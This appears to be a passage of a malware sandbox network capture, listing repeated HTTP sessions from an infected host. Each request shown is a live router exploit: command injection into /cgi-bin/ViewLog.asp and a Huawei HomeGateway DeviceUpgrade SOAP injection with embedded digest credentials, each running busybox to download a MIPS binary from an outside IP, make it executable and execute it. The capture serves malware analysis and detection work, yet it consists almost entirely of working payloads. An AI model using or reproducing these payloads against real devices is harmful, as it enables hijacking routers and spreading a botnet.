                                              Nov 23, 2023 05:17:49.574239969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.982232094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.958265066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.590215921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.854191065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              540192.168.2.134167294.103.88.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.475322008 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              541192.168.2.134736695.86.100.1558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.498049974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              542192.168.2.133774095.86.99.2138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.498063087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              543192.168.2.1349604156.235.108.9537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.987520933 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:50.758259058 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:52.934233904 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:57.286221027 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:05.734298944 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:22.374205112 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              544192.168.2.135350062.214.154.148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.613501072 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
